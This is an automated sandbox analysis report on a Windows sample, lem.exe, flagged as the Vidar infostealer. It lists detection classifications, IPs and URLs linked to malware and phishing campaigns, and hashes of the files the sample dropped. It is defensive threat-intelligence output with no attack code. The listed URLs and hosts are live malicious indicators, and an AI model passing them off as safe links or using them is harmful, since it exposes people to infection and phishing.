Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: lem.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@97/306@31/16
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 76
• Number of non-executed functions: 299
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:59:57 | API Interceptor | 1x Sleep call for process: lem.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
23.44.201.19 | pjthjsdjgjrtavv.exe | malicious | Vidar |
 | file.exe | malicious | Amadey, Stealc, Vidar |
 | invoice 700898 for wallcentre.com.shtml | malicious | Unknown |
 | 9d565bee-e6ce-1842-e729-b0df8f08ed34.eml | malicious | HTMLPhisher |
 | BraveBrowserSetup-BRV010.exe | malicious | Unknown |
 | BraveBrowserSetup-BRV002.exe | malicious | Unknown |
162.159.61.3 | HVlonDQpuI.exe | malicious | Vidar |
 | PodcastsTries.exe | malicious | Vidar |
 | ChoForgot.exe | malicious | Vidar |
 | gVKsiQIHqe.exe | malicious | Vidar |
 | trZG6pItZj.exe | malicious | Vidar |
 | Loader.exe | malicious | RHADAMANTHYS |
 | SWIFT.xls | malicious | Unknown |
 | Ocean-T2I4I8O9.exe | malicious | Unknown |
 | ktyihkdfesf.exe | malicious | Vidar |
 | pjthjsdjgjrtavv.exe | malicious | Vidar |
149.154.167.99 | http://xn--r1a.website/s/ogorodru | malicious | Unknown | telegram.org/img/favicon.ico
 | http://cryptorabotakzz.com/ | malicious | Unknown | telegram.org/
 | http://cache.netflix.com.id1.wuush.us.kg/ | malicious | Unknown | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
 | http://investors.spotify.com.sg2.wuush.us.kg/ | malicious | Unknown | telegram.org/
 | http://bekaaviator.kz/ | malicious | Unknown | telegram.org/
                                                                                                                                                                                                                                                                              http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/?setln=pl
                                                                                                                                                                                                                                                                              http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.dog/
                                                                                                                                                                                                                                                                              LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                                              • t.me/cinoshibot
                                                                                                                                                                                                                                                                              jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                                              • t.me/cinoshibot
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                              Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                                                                                                              NewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 172.67.190.223
                                                                                                                                                                                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 172.67.197.192
                                                                                                                                                                                                                                                                              exlauncher-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 172.67.218.163
                                                                                                                                                                                                                                                                              http://kxyaiaqyijjz.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 1.1.1.1
                                                                                                                                                                                                                                                                              https://pdf-ezy.com/pdf-ez.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.67.152.3
                                                                                                                                                                                                                                                                              b8ygJBG5cb.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.67.194.29
                                                                                                                                                                                                                                                                              AKAMAI-ASN1EUz3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              AiaStwRBdI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              HJVzgKyC0y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              rUfr2hQGOb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              YhF4vhbnMW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              B8NcU4mckY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              k6olCJyvIj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              BeoHXxE7q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSphish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 52.109.68.129
                                                                                                                                                                                                                                                                              phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 20.42.73.24
                                                                                                                                                                                                                                                                              HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 204.79.197.219
                                                                                                                                                                                                                                                                              Google Authenticator You're trying to sign in from a new location.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 52.109.28.46
                                                                                                                                                                                                                                                                              xd.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 20.16.86.154
                                                                                                                                                                                                                                                                              xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 40.92.218.88
                                                                                                                                                                                                                                                                              xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 104.209.1.224
                                                                                                                                                                                                                                                                              xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 20.238.93.245
                                                                                                                                                                                                                                                                              xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 13.105.88.193
                                                                                                                                                                                                                                                                              xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 104.215.126.122
Match    Associated Sample Name / URL    SHA 256    Detection    Threat Name    Link    Context
Match: C:\ProgramData\9HDT0HDBIMOZ\68QI5X
Associated Sample Name / URL:
• Filename: script.ps1, Detection: malicious, Threat Name: Vidar
• Filename: Setup.msi, Detection: malicious, Threat Name: Vidar
• Filename: nB52P46OJD.exe, Detection: malicious, Threat Name: Vidar
• Filename: lem.exe, Detection: malicious, Threat Name: Vidar
• Filename: Setup.exe, Detection: malicious, Threat Name: Vidar
• Filename: xoJxSAotVM.exe, Detection: malicious, Threat Name: Vidar
• Filename: fim3BhyKXP.gif, Detection: malicious, Threat Name: Unknown
• Filename: TMX.exe, Detection: malicious, Threat Name: Unknown
• Filename: file.exe, Detection: malicious, Threat Name: Amadey, Vidar
• Filename: lem.exe, Detection: malicious, Threat Name: Vidar
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 487443 bytes, 11 files, at 0x2c +A "Proceedings" +A "Recovery", ID 8198, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):487443
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998124391538459
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:B+S9oU3XWMHVIx884xmjdmLlSM7DGRgpqb7ITX:AeoUnW1xbAlSM3BpqATX
                                                                                                                                                                                                                                                                                                  MD5:3E6C9EC6F7CFD6FF9E44415233734692
                                                                                                                                                                                                                                                                                                  SHA1:C9E302D20AADC02EEF66CCB7E0562C9D5AAD1FAE
                                                                                                                                                                                                                                                                                                  SHA-256:59F56DFCFF7617579EC1940D61BF2AF6EFA6DD90D0849F9B658FF56859A118B9
                                                                                                                                                                                                                                                                                                  SHA-512:4467EDF1AEE44166B6D7356E3A4C91AF1F38C6934F06EC6C63EA778E96190061F05759C9AC2366AA364A35AFDBE1ED6478AFAFAC7A62EA9BA3CC153AA2E35518
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):88064
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.671440792234813
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:mGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+6:K5mjccBiqXvpgF4qv+32eOyKODOSpQ6
                                                                                                                                                                                                                                                                                                  MD5:4ED5DCEF027C1FAAD9B155A863F099E7
                                                                                                                                                                                                                                                                                                  SHA1:F86263BC8EB00B518DAC5E0DE6BB8A12753CE1D6
                                                                                                                                                                                                                                                                                                  SHA-256:B7EBD5730B85DB548DBD9086B20400350E9469B9ED64D0C7F792898DD10E9A45
                                                                                                                                                                                                                                                                                                  SHA-512:100BE28B2E696A1BA6543EE005606C782AE2E35BB0E63C56E43CB5FE03B874078A1554C7EBE40121DB5ABFED2FC90E9DDDA3F5B390BF429247268BE902047D2E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):24008
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.062446965815151
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                                                                                                                                                                                                                                                  MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                                                                                                                                                                                                                                                  SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                                                                                                                                                                                                                                                  SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                                                                                                                                                                                                                                                  SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                                  • Filename: script.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: Setup.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: nB52P46OJD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: xoJxSAotVM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: fim3BhyKXP.gif, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: TMX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2651687888907042
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:8/2qOB1nxCkMXSAELyKOMq+8yC8F/YfU5m+OlTLVumC:Bq+n0JX9ELyKOMq+8y9/OwJ
                                                                                                                                                                                                                                                                                                  MD5:2B05CFE22E737A971DE04FE241744685
                                                                                                                                                                                                                                                                                                  SHA1:5919FD449C43D46E797597A1C44457132922CE7F
                                                                                                                                                                                                                                                                                                  SHA-256:F218242FB3AF771DDB378225CDC9C2406631CB08A1C579912ECB887045AD802D
                                                                                                                                                                                                                                                                                                  SHA-512:B7291935B265EF0E88243BA7992544BA2FF6490882F4268AB5CFB3030563C41B4E44242DB351CB957CB8E5AA85B9E7365B2F316B30B4EAD9D342B3968538361D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):88064
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.671440792234813
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:mGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+6:K5mjccBiqXvpgF4qv+32eOyKODOSpQ6
                                                                                                                                                                                                                                                                                                  MD5:4ED5DCEF027C1FAAD9B155A863F099E7
                                                                                                                                                                                                                                                                                                  SHA1:F86263BC8EB00B518DAC5E0DE6BB8A12753CE1D6
                                                                                                                                                                                                                                                                                                  SHA-256:B7EBD5730B85DB548DBD9086B20400350E9469B9ED64D0C7F792898DD10E9A45
                                                                                                                                                                                                                                                                                                  SHA-512:100BE28B2E696A1BA6543EE005606C782AE2E35BB0E63C56E43CB5FE03B874078A1554C7EBE40121DB5ABFED2FC90E9DDDA3F5B390BF429247268BE902047D2E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 487443 bytes, 11 files, at 0x2c +A "Proceedings" +A "Recovery", ID 8198, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):487443
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998124391538459
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:B+S9oU3XWMHVIx884xmjdmLlSM7DGRgpqb7ITX:AeoUnW1xbAlSM3BpqATX
                                                                                                                                                                                                                                                                                                  MD5:3E6C9EC6F7CFD6FF9E44415233734692
                                                                                                                                                                                                                                                                                                  SHA1:C9E302D20AADC02EEF66CCB7E0562C9D5AAD1FAE
                                                                                                                                                                                                                                                                                                  SHA-256:59F56DFCFF7617579EC1940D61BF2AF6EFA6DD90D0849F9B658FF56859A118B9
                                                                                                                                                                                                                                                                                                  SHA-512:4467EDF1AEE44166B6D7356E3A4C91AF1F38C6934F06EC6C63EA778E96190061F05759C9AC2366AA364A35AFDBE1ED6478AFAFAC7A62EA9BA3CC153AA2E35518
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9504
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                                  MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                                  SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                                  SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                                  SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                                                  MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                                                  SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                                                  SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                                                  SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4814
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                                                  MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                                                  SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                                                  SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                                                  SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                                                  Malicious:false
